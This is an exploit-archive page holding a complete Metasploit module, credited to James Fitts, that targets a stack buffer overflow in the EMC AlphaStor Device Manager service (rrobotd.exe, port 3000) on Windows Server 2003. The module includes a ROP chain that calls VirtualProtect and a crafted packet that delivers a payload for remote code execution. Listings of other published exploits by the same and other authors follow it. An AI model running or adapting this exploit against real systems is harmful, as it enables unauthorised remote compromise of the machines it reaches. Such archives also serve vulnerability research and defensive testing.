Menu

Search for hundreds of thousands of exploits

"EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)"

Author

Exploit author

"James Fitts"

Platform

Exploit platform

windows

Release date

Exploit published date

2017-09-14

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'EMC AlphaStor Device Manager Opcode 0x72',
			'Description'    => %q{
				This module exploits a stack based buffer overflow vulnerability
				found in EMC Alphastor Device Manager. The overflow is triggered
				when sending a specially crafted packet to the rrobotd.exe service
				listening on port 3000. During the copying of strings to the stack
				an unbounded sprintf() function overwrites the return pointer
				leading to remote code execution.
			},
			'Author'         => [ 'James Fitts' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: $',
			'References'     =>
				[
					[ 'URL', '0day' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space' => 160,
					'DisableNops' => 'true',
					'BadChars' => "\x00\x09\x0a\x0d",
					'StackAdjustment' => -404,
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
					'Compat'	=> 
					{
						'ConnectionType'	=> '+ws2ord',
					}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 
						'Windows Server 2003 SP2 EN', 
							{ 
								# pop eax/ retn
								# msvcrt.dll
								'Ret' => 0x77bc5d88, 
							} 
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 14 2013'))

		register_options(
			[
				Opt::RPORT(3000)
			], self.class )
	end

	def exploit
		connect

		# msvcrt.dll
		# 96 bytes
		rop = [
			0x77bb2563,	# pop eax/ retn 
                        0x77ba1114,	# ptr to kernel32!virtualprotect
                        0x77bbf244,	# mov eax, dword ptr [eax]/ pop ebp/ retn
                        0xfeedface,
                        0x77bb0c86,	# xchg eax, esi/ retn
                        0x77bc9801,	# pop ebp/ retn
                        0x77be2265,
                        0x77bb2563,	# pop eax/ retn
                        0x03C0990F,
                        0x77bdd441,	# sub eax, 3c0940fh/ retn
                        0x77bb48d3,	# pop eax/ retn
                        0x77bf21e0,
                        0x77bbf102,	# xchg eax, ebx/ add byte ptr [eax], al/ retn
                        0x77bbfc02,	# pop ecx/ retn
                        0x77bef001,
                        0x77bd8c04,	# pop edi/ retn
                        0x77bd8c05,
                        0x77bb2563,	# pop eax/ retn
                        0x03c0984f,
                        0x77bdd441,	# sub eax, 3c0940fh/ retn
                        0x77bb8285,	# xchg eax, edx/ retn
                        0x77bb2563,	# pop eax/ retn
                        0x90909090,
                        0x77be6591,	# pushad/ add al, 0efh/ retn
		].pack("V*")

		buf = "\xcc" * 550
		buf[246, 4] = [target.ret].pack('V')
		buf[250, 4] = [0x77bf6f80].pack('V')
		buf[254, rop.length] = rop
		buf[350, payload.encoded.length] = payload.encoded

		packet = "\x72#{buf}"

		print_status("Trying target %s..." % target.name)

		sock.put(packet)

		handler
		disconnect
	end

end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2017-09-27 "LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)" remote multiple "James Fitts"
2017-09-14 "Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)" remote windows "James Fitts"
2017-09-14 "EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-14 "haneWIN DNS Server 1.5.3 - Remote Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-14 "EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-14 "Lockstep Backup for Workgroups 4.0.3 - Remote Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-14 "KingScada AlarmServer 3.1.2.13 - Remote Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)" remote linux "James Fitts"
2017-09-13 "Infinite Automation Mango Automation - Command Injection (Metasploit)" remote jsp "James Fitts"
2017-09-13 "Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)" remote php "James Fitts"
2017-09-13 "Alienvault OSSIM av-centerd - Util.pm sync_rserver Command Execution (Metasploit)" remote linux "James Fitts"
2017-09-13 "Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)" remote windows "James Fitts"
2017-09-13 "Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)" webapps windows "James Fitts"
2017-09-13 "Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)" remote java "James Fitts"
2017-09-13 "EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)" remote java "James Fitts"
2017-09-13 "Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Motorola Netopia Netoctopus SDCS - Remote Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Sielco Sistemi Winlog 2.07.16 - Remote Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "ZScada Modbus Buffer 2.0 - Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)" webapps windows "James Fitts"
2017-09-13 "Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)" webapps windows "James Fitts"
2017-08-01 "Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload" webapps jsp "James Fitts"
2017-08-01 "Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)" webapps jsp "James Fitts"
2014-08-14 "Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)" remote linux "James Fitts"
2014-06-13 "Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)" remote linux "James Fitts"
2011-08-04 "ABBS Audio Media Player 3.0 - Local Buffer Overflow (Metasploit)" local windows "James Fitts"
2011-08-04 "FreeAmp 2.0.7 - '.fat' Local Buffer Overflow (Metasploit)" local windows "James Fitts"
2011-08-04 "ABBS Electronic Flashcards 2.1 - Local Buffer Overflow (Metasploit)" local windows "James Fitts" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected